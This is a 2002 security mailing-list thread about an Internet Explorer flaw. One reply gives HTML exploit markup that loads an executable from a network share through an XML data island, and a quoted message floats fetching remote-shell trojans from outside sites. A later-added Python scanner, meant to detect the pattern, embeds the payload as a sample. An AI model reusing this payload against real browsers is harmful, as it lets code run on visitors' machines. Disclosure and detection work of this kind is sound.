RE: Rather large MSIE-hole

From: John Swensson (jswensson@integres.com)
Date: 03/15/02


Date: Thu, 14 Mar 2002 16:23:55 -0800
From: "John Swensson" <jswensson@integres.com>
To: "KF" <dotslash@snosoft.com>, <vuln-dev@security-focus.com>

Well, if ActiveX is enabled, doing this with an available Windows share that is readable by everyone works:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile"
                    classid="clsid:11111111-1111-1111-1111-111111111111"
                    codebase="\\xxx.xxx.xxx.xxx\share\exploit.exe"></object>
            ]]>
        </exploit>
    </security>
</xml>

-john

jswensson@integres.com

>-----Original Message-----
>From: KF [mailto:dotslash@snosoft.com]
>Sent: Thursday, March 14, 2002 2:48 PM
>To: vuln-dev@security-focus.com
>Subject: Re: Rather large MSIE-hole
>
>
>Another thought... will this bug run an executable from a web page? If
>so you could just make your own binary to do whatever you wanted. Like
>http://mysiteathome.com/malware.exe or something along those lines. I
>would HOPE that it asks to save the file to disk or even better ignore
>it altogether. Maybe try something like:
>
>var programName=new Array(
> 'http://mysiteathome.com/ncx99.exe',
> 'http://someothersite.com/ncx99.exe'
>);
>
>I would do this myself but I don't have any Windows boxen to test.
>-KF
>
>
>Paul D. Campbell wrote:
>
>>>Could you not create a batch file that housed the commands you wanted
>>>to run
>>>(with args) and just run the batch file?
>>>I apologise if someone has already addressed this.
>>>
>>>-Eric
>>>
>>
>>You would probably be able to do this. However, you would first need
>>to place the batch file on the target machine. Then you would have to
>>sit around and hope the user visits your malicious site. Though, if
>>you have the capability to write to someone's hard drive you could do
>>something much nastier than this :)
>>
>>Paul
>>
>>
>
>
>
>
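
A defensive check for the pattern shown in this message, added here as an example and not code from the thread: it flags pages where an element is data-bound with `dataformatas="html"` to an XML data island whose content carries an `<object>` tag with a `codebase` pointing at a UNC path or an executable. The function names, the extension list and the regex-based parsing are assumptions chosen for this sketch, and the sample input is constructed from the markup quoted above.

```python
import html
import re

ATTR = re.compile(r'([\w:-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
ISLAND = re.compile(r'<xml\b([^>]*)>(.*?)</xml\s*>', re.I | re.S)
BOUND = re.compile(r'<\w+\b([^>]*\bdatasrc\b[^>]*)>', re.I)
OBJECT = re.compile(r'<object\b([^>]*)>', re.I)
EXEC_EXT = ('.exe', '.scr', '.bat', '.cmd', '.pif')  # assumed list, extend as needed

def attrs(raw):
    """Parse a tag's attribute text into a dict with lower-cased names."""
    return {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ''
            for m in ATTR.finditer(raw)}

def codebase_risk(value):
    """Return a reason label for a suspicious codebase value, else None."""
    v = value.strip().lower()
    if v.startswith('\\\\'):
        return 'unc-path'
    if v.split('#')[0].split('?')[0].endswith(EXEC_EXT):
        return 'executable'
    return None

def scan(page):
    """Return (datasrc, datafld, codebase, reason) for each risky HTML binding."""
    islands = {'#' + attrs(m.group(1)).get('id', '').lower(): m.group(2)
               for m in ISLAND.finditer(page)}
    findings = []
    for m in BOUND.finditer(page):
        a = attrs(m.group(1))
        body = islands.get(a.get('datasrc', '').lower())
        if body is None or a.get('dataformatas', '').lower() != 'html':
            continue  # bound as plain text, or no matching island on the page
        fld = re.escape(a.get('datafld', ''))
        hit = fld and re.search(r'<%s\b[^>]*>(.*?)</%s\s*>' % (fld, fld), body, re.I | re.S)
        # The markup may sit in CDATA or be entity-encoded; unescape covers both.
        markup = html.unescape(hit.group(1) if hit else body)
        for obj in OBJECT.finditer(markup):
            cb = attrs(obj.group(1)).get('codebase', '')
            if codebase_risk(cb):
                findings.append((a['datasrc'], a.get('datafld', ''), cb, codebase_risk(cb)))
    return findings

# Constructed sample, modelled on the markup quoted in the post.
SAMPLE = r'''<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="\\xxx.xxx.xxx.xxx\share\exploit.exe"></object>
]]></exploit></security></xml>'''
```

Calling `scan(SAMPLE)` returns one finding with the reason `unc-path`; a binding with `dataformatas="text"` or a `codebase` pointing at a `.cab` package returns nothing.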


